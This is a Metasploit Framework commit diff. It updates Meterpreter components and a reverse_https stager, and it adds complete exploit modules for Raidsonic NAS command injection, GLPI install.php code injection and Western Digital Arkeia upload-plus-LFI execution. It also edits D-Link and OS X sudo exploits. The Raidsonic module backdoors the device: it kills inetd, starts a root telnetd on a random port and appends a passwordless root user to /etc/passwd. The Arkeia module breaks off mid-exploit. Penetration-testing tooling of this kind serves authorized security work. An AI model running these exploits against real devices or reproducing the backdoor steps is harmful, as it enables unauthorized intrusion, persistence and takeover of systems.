Unicode fix for MSIE theme exploit

Extra staging commits: Meterpreter, bug fixes, etc
This is a squash of recent fixes to Metasploit Framework since the last release: * Update of the Meterpreter binaries [FixRM #8364] * Update to Meterpreter ruby components [FixRM #8395] * Update to test scripts * Update to msftidy and retab tools * Updates ASM source for block_reverse_https.asm * Removes Id and Version SVN tags from scripts/meterpreter * Adds a longer travis timeout * Avoids an rbenv annoyance recently introduced
2013-09-23 14:23:14 -05:00 · 2013-09-23 14:16:13 -05:00 · 2013-09-23 14:13:49 -05:00 · 2013-09-23 11:32:39 -05:00
132 changed files with 1968 additions and 361 deletions
@@ -1 +1 @@
-ruby-1.9.3-p448
+1.9.3-p448
@@ -15,4 +15,4 @@ notifications:
  irc: "irc.freenode.org#msfnotify"

 git:
-  depth: 1
+  depth: 5
@@ -1,6 +1,7 @@
 ;-----------------------------------------------------------------------------;
 ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 ; Rewritten for x64 by agix
+; Modified to account for memory alignment by rwincey
 ; Compatible: Windows 7
 ; Architecture: x64
 ;-----------------------------------------------------------------------------;
@@ -12,6 +13,7 @@

 load_wininet:
  ; setup the structures we need on the stack...
+  push byte 0            ; alignment
  mov r14, 'wininet'
  push r14               ; Push the bytes 'wininet',0 onto the stack.
  mov r14, rsp           ; save pointer to the "wininet" string for LoadLibraryA call.
@@ -20,6 +22,7 @@ load_wininet:
  call rbp               ; LoadLibraryA( "ws2_32" )

 internetopen:
+  push byte 0            ; alignment
  push byte 0            ; NULL pointer
  mov rcx, rsp           ; LPCTSTR lpszAgent ("\x00")
  xor rdx, rdx           ; DWORD dwAccessType (PRECONFIG = 0)
@@ -74,6 +77,7 @@ retry:
 internetsetoption:
  mov rcx, rsi           ; HINTERNET hInternet
  mov rdx, 31            ; DWORD dwOption (INTERNET_OPTION_SECURITY_FLAGS)
+  push byte 0            ; alignment
  push qword 0x00003380
    ;0x00002000 |        ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
    ;0x00001000 |        ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
@@ -90,6 +94,7 @@ httpsendrequest:
  xor rdx, rdx           ; LPCTSTR lpszHeaders
  xor r8, r8             ; DWORD dwHeadersLength
  xor r9, r9             ; LPVOID lpOptional
+  push rdx               ; alignment
  push rdx               ; DWORD dwOptionalLength
  mov r10, 0x7B18062D    ; hash( "wininet.dll", "HttpSendRequestA" )
  call rbp
@@ -15,7 +15,7 @@ class Meterpreter_x86_Win < Msf::Sessions::Meterpreter
  def initialize(rstream,opts={})
    super
    self.platform      = 'x86/win32'
-    self.binary_suffix = 'dll'
+    self.binary_suffix = 'x86.dll'
  end

  def lookup_error(code)
@@ -12,9 +12,21 @@ require 'msf/core'
 module Msf::Payload::Windows

  require 'msf/core/payload/windows/prepend_migrate'
+
  # Provides the #prepends method
+  # XXX: For some unfathomable reason, the order of requires here is
+  # important. If this include happens after require'ing the files
+  # below, it causes the windows/exec payload (and probably others) to
+  # somehow not have PrependMigrate despite having Payload::Windows,
+  # which leads to a NoMethodError on #prepends
  include Msf::Payload::Windows::PrependMigrate

+  require 'msf/core/payload/windows/dllinject'
+  require 'msf/core/payload/windows/exec'
+  require 'msf/core/payload/windows/loadlibrary'
+  require 'msf/core/payload/windows/reflectivedllinject'
+  require 'msf/core/payload/windows/x64/reflectivedllinject'
+
  #
  # ROR hash associations for some of the exit technique routines.
  #
@@ -55,6 +55,7 @@ module Rex
        end
        # Reset the state once we close a host
        @state.delete_if {|k| k != :current_tag}
+        @report_data = {:wspace => args[:wspace]}
      when "Port"
        @state[:has_text] = false
        collect_port
@@ -4,6 +4,9 @@
 require 'rex/post/meterpreter/packet'
 require 'rex/post/meterpreter/extension'
 require 'rex/post/meterpreter/client'
+
+# Used to generate a reflective DLL when migrating. This is yet another
+# argument for moving the meterpreter client into the Msf namespace.
 require 'msf/core/payload/windows'

 module Rex
@@ -147,7 +150,7 @@ class ClientCore < Extension
    end
    # Get us to the installation root and then into data/meterpreter, where
    # the file is expected to be
-    path = ::File.join(Msf::Config.install_root, 'data', 'meterpreter', 'ext_server_' + mod.downcase + ".#{client.binary_suffix}")
+    path = ::File.join(Msf::Config.data_directory, 'meterpreter', 'ext_server_' + mod.downcase + ".#{client.binary_suffix}")

    if (opts['ExtensionPath'])
      path = opts['ExtensionPath']
@@ -209,7 +212,7 @@ class ClientCore < Extension
    # Include the appropriate reflective dll injection module for the target process architecture...
    if( process['arch'] == ARCH_X86 )
      c.include( ::Msf::Payload::Windows::ReflectiveDllInject )
-      binary_suffix = "dll"
+      binary_suffix = "x86.dll"
    elsif( process['arch'] == ARCH_X86_64 )
      c.include( ::Msf::Payload::Windows::ReflectiveDllInject_x64 )
      binary_suffix = "x64.dll"
@@ -219,7 +222,7 @@ class ClientCore < Extension

    # Create the migrate stager
    migrate_stager = c.new()
-    migrate_stager.datastore['DLL'] = ::File.join( Msf::Config.install_root, "data", "meterpreter", "metsrv.#{binary_suffix}" )
+    migrate_stager.datastore['DLL'] = ::File.join( Msf::Config.data_directory, "meterpreter", "metsrv.#{binary_suffix}" )

    blob = migrate_stager.stage_payload

@@ -297,7 +300,7 @@ class ClientCore < Extension
      client.binary_suffix = 'x64.dll'
    else
      client.platform      = 'x86/win32'
-      client.binary_suffix = 'dll'
+      client.binary_suffix = 'x86.dll'
    end

    # Load all the extensions that were loaded in the previous instance (using the correct platform/binary_suffix)
@@ -46,11 +46,7 @@ class Priv < Extension

    elevator_name = Rex::Text.rand_text_alpha_lower( 6 )

-    if( client.platform == 'x64/win64' )
-      elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.x64.dll" )
-    else
-      elevator_path = ::File.join( Msf::Config.install_root, "data", "meterpreter", "elevator.dll" )
-    end
+    elevator_path = ::File.join( Msf::Config.data_directory, "meterpreter", "elevator.#{client.binary_suffix}" )

    elevator_path = ::File.expand_path( elevator_path )

@@ -157,7 +157,7 @@ class UI < Rex::Post::UI
    request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_QUALITY, quality )
    # include the x64 screenshot dll if the host OS is x64
    if( client.sys.config.sysinfo['Architecture'] =~ /^\S*x64\S*/ )
-      screenshot_path = ::File.join( Msf::Config.install_root, 'data', 'meterpreter', 'screenshot.x64.dll' )
+      screenshot_path = ::File.join( Msf::Config.data_directory, 'meterpreter', 'screenshot.x64.dll' )
      screenshot_path = ::File.expand_path( screenshot_path )
      screenshot_dll  = ''
      ::File.open( screenshot_path, 'rb' ) do |f|
@@ -167,7 +167,7 @@ class UI < Rex::Post::UI
      request.add_tlv( TLV_TYPE_DESKTOP_SCREENSHOT_PE64DLL_LENGTH, screenshot_dll.length )
    end
    # but allways include the x86 screenshot dll as we can use it for wow64 processes if we are on x64
-    screenshot_path = ::File.join( Msf::Config.install_root, 'data', 'meterpreter', 'screenshot.dll' )
+    screenshot_path = ::File.join( Msf::Config.data_directory, 'meterpreter', 'screenshot.x86.dll' )
    screenshot_path = ::File.expand_path( screenshot_path )
    screenshot_dll  = ''
    ::File.open( screenshot_path, 'rb' ) do |f|
@@ -377,7 +377,7 @@ class Console::CommandDispatcher::Core
      case opt
        when "-l"
          exts = []
-          path = ::File.join(Msf::Config.install_root, 'data', 'meterpreter')
+          path = ::File.join(Msf::Config.data_directory, 'meterpreter')
          ::Dir.entries(path).each { |f|
            if (::File.file?(::File.join(path, f)) && f =~ /ext_server_(.*)\.#{client.binary_suffix}/ )
              exts.push($1)
@@ -422,7 +422,7 @@ class Console::CommandDispatcher::Core

  def cmd_load_tabs(str, words)
    tabs = []
-    path = ::File.join(Msf::Config.install_root, 'data', 'meterpreter')
+    path = ::File.join(Msf::Config.data_directory, 'meterpreter')
    ::Dir.entries(path).each { |f|
      if (::File.file?(::File.join(path, f)) && f =~ /ext_server_(.*)\.#{client.binary_suffix}/ )
        if (not extensions.include?($1))
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
    super(update_info(info,
      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
-        Different D-Link Routers are vulnerable to OS command injection via the web
+        Various D-Link Routers are vulnerable to OS command injection via the web
        interface. The vulnerability exists in command.php, which is accessible without
        authentication. This module has been tested with the versions DIR-600 2.14b01,
        DIR-300 rev B 2.13.
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def exploit
-    telnetport = rand(65535)
+    telnetport = rand(32767) + 32768

    print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")

@@ -88,12 +88,15 @@ class Metasploit3 < Msf::Exploit::Remote
    request(cmd)

    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })

    if sock.nil?
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end

+    add_socket(sock)
+
    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
    if prompt.nil?
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
    super(update_info(info,
      'Name'        => 'D-Link Devices Unauthenticated Remote Command Execution',
      'Description' => %q{
-        Different D-Link Routers are vulnerable to OS command injection via the web
+        Various D-Link Routers are vulnerable to OS command injection via the web
        interface. The vulnerability exists in tools_vct.xgi, which is accessible with
        credentials. According to the vulnerability discoverer, more D-Link devices may
        be affected.
@@ -129,7 +129,7 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def exploit_telnet
-    telnetport = rand(65535)
+    telnetport = rand(32767) + 32768

    print_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")

@@ -139,12 +139,15 @@ class Metasploit3 < Msf::Exploit::Remote
    request(cmd)

    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })

    if sock.nil?
      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end

+    add_socket(sock)
+
    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
    if prompt.nil?
@@ -76,9 +76,9 @@ class Metasploit3 < Msf::Exploit::Remote

  def exploit
    @new_portmapping_descr = rand_text_alpha(8)
-    @new_external_port = rand(65535)
-    @new_internal_port = rand(65535)
-    telnetport = rand(65535)
+    @new_external_port = rand(32767) + 32768
+    @new_internal_port = rand(32767) + 32768
+    telnetport = rand(32767) + 32768

    vprint_status("#{rhost}:#{rport} - Telnetport: #{telnetport}")

@@ -95,12 +95,15 @@ class Metasploit3 < Msf::Exploit::Remote
    end

    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
-    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })

    if sock.nil?
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
    end

+    add_socket(sock)
+
    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
    prompt = negotiate_telnet(sock)
    if prompt.nil?
@@ -0,0 +1,205 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking # It's backdooring the remote device
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+  include Msf::Exploit::FileDropper
+
+  RESPONSE_PATTERN = "\<FORM\ NAME\=\"form\"\ METHOD\=\"POST\"\ ACTION\=\"\/cgi\/time\/time.cgi\"\ ENCTYPE\=\"multipart\/form-data"
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'Raidsonic NAS Devices Unauthenticated Remote Command Execution',
+      'Description' => %q{
+        Different Raidsonic NAS devices are vulnerable to OS command injection via the web
+        interface. The vulnerability exists in timeHandler.cgi, which is accessible without
+        authentication. This module has been tested with the versions IB-NAS5220 and
+        IB-NAS4220. Since this module is adding a new user and modifying the inetd daemon
+        configuration, this module is set to ManualRanking and could cause target instability.
+      },
+      'Author'      =>
+        [
+          'Michael Messner <devnull@s3cur1ty.de>', # Vulnerability discovery and Metasploit module
+          'juan vazquez' # minor help with msf module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'OSVDB', '90221' ],
+          [ 'EDB', '24499' ],
+          [ 'BID', '57958' ],
+          [ 'URL', 'http://www.s3cur1ty.de/m1adv2013-010' ]
+        ],
+      'DisclosureDate' => 'Feb 04 2013',
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Payload'     =>
+        {
+          'Compat'  => {
+            'PayloadType'    => 'cmd_interact',
+            'ConnectionType' => 'find',
+          },
+        },
+      'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
+      'Targets'        =>
+        [
+          [ 'Automatic', { } ],
+        ],
+      'DefaultTarget'  => 0
+      ))
+
+    register_advanced_options(
+      [
+        OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
+        OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25])
+      ], self.class)
+  end
+
+  def tel_timeout
+    (datastore['TelnetTimeout'] || 10).to_i
+  end
+
+  def banner_timeout
+    (datastore['TelnetBannerTimeout'] || 25).to_i
+  end
+
+  def exploit
+    telnet_port = rand(32767) + 32768
+
+    print_status("#{rhost}:#{rport} - Telnet port: #{telnet_port}")
+
+    #first request
+    cmd = "killall inetd"
+    cmd = Rex::Text.uri_encode(cmd)
+    print_status("#{rhost}:#{rport} - sending first request - killing inetd")
+
+    res = request(cmd)
+    #no server header or something that we could use to get sure the command is executed
+    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+    end
+
+    #second request
+    inetd_cfg = rand_text_alpha(8)
+    cmd = "echo \"#{telnet_port} stream tcp nowait root /usr/sbin/telnetd telnetd\" > /tmp/#{inetd_cfg}"
+    cmd = Rex::Text.uri_encode(cmd)
+    print_status("#{rhost}:#{rport} - sending second request - configure inetd")
+
+    res = request(cmd)
+    #no server header or something that we could use to get sure the command is executed
+    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+    end
+    register_file_for_cleanup("/tmp/#{inetd_cfg}")
+
+    #third request
+    cmd = "/usr/sbin/inetd /tmp/#{inetd_cfg}"
+    cmd = Rex::Text.uri_encode(cmd)
+    print_status("#{rhost}:#{rport} - sending third request - starting inetd and telnetd")
+
+    res = request(cmd)
+    #no server header or something that we could use to get sure the command is executed
+    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+    end
+
+    #fourth request
+    @user = rand_text_alpha(6)
+    cmd = "echo \"#{@user}::0:0:/:/bin/ash\" >> /etc/passwd"
+    cmd = Rex::Text.uri_encode(cmd)
+    print_status("#{rhost}:#{rport} - sending fourth request - configure user #{@user}")
+
+    res = request(cmd)
+    #no server header or something that we could use to get sure the command is executed
+    if (!res or res.code != 200 or res.body !~ /#{RESPONSE_PATTERN}/)
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+    end
+
+    print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
+    ctx = { 'Msf' => framework, 'MsfExploit' => self }
+    sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnet_port.to_i, 'Context' => ctx })
+
+    if sock.nil?
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
+    end
+
+    add_socket(sock)
+
+    print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
+    prompt = negotiate_telnet(sock)
+    if prompt.nil?
+      sock.close
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
+    else
+      print_good("#{rhost}:#{rport} - Telnet session successfully established...")
+    end
+
+    handler(sock)
+
+  end
+
+  def request(cmd)
+
+    uri = '/cgi/time/timeHandler.cgi'
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'POST',
+        #not working without setting encode_params to false!
+        'encode_params' => false,
+        'vars_post' => {
+          "month"        => "#{rand(12)}",
+          "date"         => "#{rand(30)}",
+          "year"         => "20#{rand(99)}",
+          "hour"         => "#{rand(12)}",
+          "minute"       => "#{rand(60)}",
+          "ampm"         => "PM",
+          "timeZone"     => "Amsterdam`#{cmd}`",
+          "ntp_type"     => "default",
+          "ntpServer"    => "none",
+          "old_date"     => " 1 12007",
+          "old_time"     => "1210",
+          "old_timeZone" => "Amsterdam",
+          "renew"        => "0"
+          }
+        })
+      return res
+    rescue ::Rex::ConnectionError
+      fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
+    end
+  end
+
+  def negotiate_telnet(sock)
+    login = read_telnet(sock, "login: $")
+    if login
+      sock.put("#{@user}\r\n")
+    end
+    return read_telnet(sock, "> $")
+  end
+
+  def read_telnet(sock, pattern)
+    begin
+      Timeout.timeout(banner_timeout) do
+        while(true)
+          data = sock.get_once(-1, tel_timeout)
+          return nil if not data or data.length == 0
+          if data =~ /#{pattern}/
+            return true
+          end
+        end
+      end
+    rescue ::Timeout::Error
+      return nil
+    end
+  end
+end
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote
  def exploit
    print_status("#{rhost}:#{rport} - Executing payload...")
    url = "http://www.#{rand_text_alpha(10 + rand(10))}.com"
-    domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.raw}"
+    domain = "http://#{rand_text_alpha(10 + rand(10))}.com;#{payload.encoded}"
    # very short timeout because the request may never return if we're
    # sending a socket payload
    send_exploit_query(url, domain, 0.01)
@@ -0,0 +1,114 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking # Application database configuration is overwritten
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'GLPI install.php Remote Command Execution',
+      'Description'    => %q{
+        This module exploits an arbitrary command execution vulnerability in the
+        GLPI 'install.php' script. This module is set to ManualRanking due to this
+        module overwriting the target database configuration, which may introduce target
+        instability.
+      },
+      'Author'         =>
+        [
+          'Tristan Leiter < research[at]navixia.com >', # Navixia Research Team
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2013-5696' ],
+          [ 'URL', 'https://www.navixia.com/blog/entry/navixia-finds-critical-vulnerabilities-in-glpi-cve-2013-5696.html' ],
+          [ 'URL', 'http://www.glpi-project.org/forum/viewtopic.php?id=33762' ],
+        ],
+      'Privileged'     => false,
+      'Platform'       => ['php'],
+      'Payload'        =>
+        {
+          'Space'       => 4000,
+          'BadChars'    => "#",
+          'DisableNops' => true,
+          'Keys'        => ['php']
+        },
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [[ 'GLPI 0.84 or older', { }]],
+      'DisclosureDate' => 'Sep 12 2013',
+      'DefaultTarget'  => 0))
+
+      register_options(
+        [
+          OptString.new('TARGETURI', [true, 'The base path to GLPI', '/glpi/'])
+        ], self.class)
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def check
+    # Check if the GLPI instance is vulnerable
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(uri, 'index.php'),
+    })
+
+    if not res or res.code != 200
+      return Exploit::CheckCode::Safe
+    end
+
+    re = '(version)(\\s+)(.*)(\\s+)(Copyright)'
+    m = Regexp.new(re, Regexp::IGNORECASE)
+    matched = m.match(res.body)
+    if matched and matched[3] =~ /0.(8[0-4].[0-1])|([0-7][0-9].[0-9])/
+      print_good("Detected Version : #{matched[3]}")
+      return Exploit::CheckCode::Appears
+    elsif matched
+      print_error("Version #{matched[3]} is not vulnerable")
+    end
+    return Exploit::CheckCode::Safe
+
+  end
+
+  def exploit
+    print_status("Injecting the payload...")
+    rand_arg = Rex::Text.rand_text_hex(10)
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(uri, 'install/install.php'),
+      'vars_post' =>
+      {
+        'install'      => 'update_1',
+        'db_host'      => 'localhost',
+        'db_user'      => 'root',
+        'db_pass'      => 'root',
+        'databasename' =>"'; } if(isset($_GET['#{rand_arg}'])){ #{payload.encoded} } /*"
+      }
+    })
+
+    unless res and res.code == 200 and res.body =~ /You will update the GLPI database/
+      print_warning("Unexpected response while injecting the payload, trying to execute anyway...")
+    end
+
+    print_status("Executing the payload...")
+    send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(uri, 'index.php'),
+      'vars_get'  =>
+      {
+        rand_arg => '1',
+      }
+    })
+  end
+
+end
@@ -27,9 +27,10 @@ class Metasploit3 < Msf::Exploit::Local
  SYSTEMSETUP_PATH = "/usr/sbin/systemsetup"
  SUDOER_GROUP = "admin"
  VULNERABLE_VERSION_RANGES = [['1.6.0', '1.7.10p6'], ['1.8.0', '1.8.6p6']]
+  CMD_TIMEOUT = 45

  # saved clock config
-  attr_accessor :time, :date, :networked, :zone, :network_server
+  attr_accessor :clock_changed, :date, :network_server, :networked, :time, :zone

  def initialize(info={})
    super(update_info(info,
@@ -44,8 +45,14 @@ class Metasploit3 < Msf::Exploit::Local
        user has ever run the "sudo" command, it is possible to become the super
        user by running `sudo -k` and then resetting the system clock to 01-01-1970.

-        This module will fail silently if the user is not an admin or if the user has never
-        run the sudo command.
+        This module will fail silently if the user is not an admin, if the user has never
+        run the sudo command, or if the admin has locked the Date/Time preferences.
+
+        Note: If the user has locked the Date/Time preferences, requests to overwrite
+        the system clock will be ignored, and the module will silently fail. However,
+        if the "Require an administrator password to access locked preferences" setting
+        is not enabled, the Date/Time preferences are often unlocked everytime the admin
+        logs in, so you can install persistence and wait for a chance later.
      },
      'License'       => MSF_LICENSE,
      'Author'        =>
@@ -115,10 +122,10 @@ class Metasploit3 < Msf::Exploit::Local

    if not user_in_admin_group?
      print_error "sudo version is vulnerable, but user is not in the admin group (necessary to change the date)."
-      Exploit::CheckCode::Safe
+      return Exploit::CheckCode::Safe
    end
    # one root for you sir
-    Exploit::CheckCode::Vulnerable
+    return Exploit::CheckCode::Vulnerable
  end

  def exploit
@@ -128,15 +135,6 @@ class Metasploit3 < Msf::Exploit::Local
    # "remember" the current system time/date/network/zone
    print_good("User is an admin, continuing...")

-    # drop the payload (unless CMD)
-    if using_native_target?
-      cmd_exec("mkdir -p #{File.dirname(drop_path)}")
-      write_file(drop_path, generate_payload_exe)
-      register_files_for_cleanup(drop_path)
-      cmd_exec("chmod +x #{[drop_path].shelljoin}")
-      print_status("Payload dropped and registered for cleanup")
-    end
-
    print_status("Saving system clock config...")
    @time = cmd_exec("#{SYSTEMSETUP_PATH} -gettime").match(/^time: (.*)$/i)[1]
    @date = cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match(/^date: (.*)$/i)[1]
@@ -150,19 +148,23 @@ class Metasploit3 < Msf::Exploit::Local
  end

  def cleanup
-    print_status("Resetting system clock to original values") if @time
-    cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
-    cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
-    cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
-
-    if @networked
-      cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
-      unless @network_server.nil?
-        cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+    if @clock_changed
+      print_status("Resetting system clock to original values") if @time
+      cmd_exec("#{SYSTEMSETUP_PATH} -settimezone #{[@zone].shelljoin}") unless @zone.nil?
+      cmd_exec("#{SYSTEMSETUP_PATH} -setdate #{[@date].shelljoin}") unless @date.nil?
+      cmd_exec("#{SYSTEMSETUP_PATH} -settime #{[@time].shelljoin}") unless @time.nil?
+      if @networked
+        cmd_exec("#{SYSTEMSETUP_PATH} -setusingnetworktime On")
+        unless @network_server.nil?
+          cmd_exec("#{SYSTEMSETUP_PATH} -setnetworktimeserver #{[@network_server].shelljoin}")
+        end
      end
+      print_good("Completed clock reset.")
+    else
+      print_status "Skipping cleanup since the clock was never changed"
    end

-    print_good("Completed clock reset.") if @time
+    super
  end

  private
@@ -174,6 +176,23 @@ class Metasploit3 < Msf::Exploit::Local
      "#{SYSTEMSETUP_PATH} -setusingnetworktime Off -settimezone GMT"+
      " -setdate 01:01:1970 -settime 00:00"
    )
+    if not cmd_exec("#{SYSTEMSETUP_PATH} -getdate").match("1/1/1970")
+      fail_with(
+        Exploit::Failure::NoAccess,
+        "Date and time preference pane appears to be locked. By default, this pane is unlocked upon login."
+      )
+    else
+      @clock_changed = true
+    end
+
+    # drop the payload (unless CMD)
+    if using_native_target?
+      cmd_exec("mkdir -p #{File.dirname(drop_path)}")
+      write_file(drop_path, generate_payload_exe)
+      register_files_for_cleanup(drop_path)
+      cmd_exec("chmod +x #{[drop_path].shelljoin}")
+      print_status("Payload dropped and registered for cleanup")
+    end

    # Run Test
    test = rand_text_alpha(4 + rand(4))
@@ -207,6 +226,11 @@ class Metasploit3 < Msf::Exploit::Local

  end

+  # default cmd_exec timeout to CMD_TIMEOUT constant
+  def cmd_exec(cmd, args=nil, timeout=CMD_TIMEOUT)
+    super
+  end
+
  # helper methods for accessing datastore
  def using_native_target?; target.name =~ /native/i; end
  def using_cmd_target?; target.name =~ /cmd/i; end
@@ -0,0 +1,137 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+#   http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Western Digital Arkeia Remote Code Execution",
+      'Description'    => %q{
+        This module exploits a vulnerability found in Western Digital Arkeia Appliance
+        version 10.0.10 and lower. By abusing the upload.php script,
+        a malicious user can upload arbitrary code to the ApplianceUpdate file in the temp
+        directory without authentication. Abusing the local file inclusion in the lang
+        cookie to parse this file results in arbitrary code execution, also without
+        authentication. The module has been tested successfully on Arkeia 10.0.10. The issues
+        have been fixed in version 10.1.10.
+      },
+      'License'         => MSF_LICENSE,
+      'Author'          =>
+        [
+         'xistence <xistence[at]0x90.nl>' # Discovery, Metasploit module
+        ],
+      'References'      =>
+        [
+          ['EDB', '28330']
+        ],
+      'Platform'        => ['php'],
+      'Arch'            => ARCH_PHP,
+      'Targets'         =>
+        [
+          ['Western Digital Arkeia Appliance 10.0.10', {}]
+        ],
+      'Privileged'      => false,
+      'DisclosureDate'  => "Sep 16 2013",
+      'DefaultTarget'   => 0))
+
+    register_options(
+      [
+       OptString.new('TARGETURI', [true, 'The base path to the Arkeia Appliance', '/'])
+      ], self.class)
+  end
+
+  def uri
+    return target_uri.path
+  end
+
+  def peer
+    return "#{rhost}:#{rport}"
+  end
+
+  def check
+    # Check version
+    print_status("#{peer} - Trying to detect installed version")
+
+    res = send_request_cgi({
+     'method' => 'GET',
+     'uri'    => normalize_uri(uri)
+    })
+
+    if res and res.code == 200 and res.body =~ /v(\d+\.\d+\.\d+)/
+      version = $1
+    else
+      return Exploit::CheckCode::Unknown
+    end
+
+    print_status("#{peer} - Version #{version} detected")
+
+    if version > "10.0.10"
+      return Exploit::CheckCode::Safe
+    end
+
+    # Check for vulnerable component
+    print_status("#{peer} - Trying to detect the vulnerable component")
+
+    res = send_request_cgi({
+      'method' => 'GET',
+      'headers' => { 'Cookie' => "lang=fr" },
+      'uri'    => normalize_uri(uri)
+    })
+
+    if res and res.code == 200 and res.body =~ /Les versions brutes des messages est affichee ci-dessous/
+      return Exploit::CheckCode::Vulnerable
+    end
+
+    return Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    payload_name = rand_text_alpha(rand(10) + 5)
+
+    post_data = Rex::MIME::Message.new
+    post_data.add_part(payload.encoded, "application/octet-stream", nil, "form-data; name=\"UPLOAD\"; filename=\"#{payload_name}\"")
+    file = post_data.to_s
+    file.strip!
+
+    print_status("#{peer} - Sending PHP payload which will be uploaded to hardcoded /tmp/ApplianceUpdate")
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(uri, "scripts", "upload.php"),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'data'   => file
+    })
+
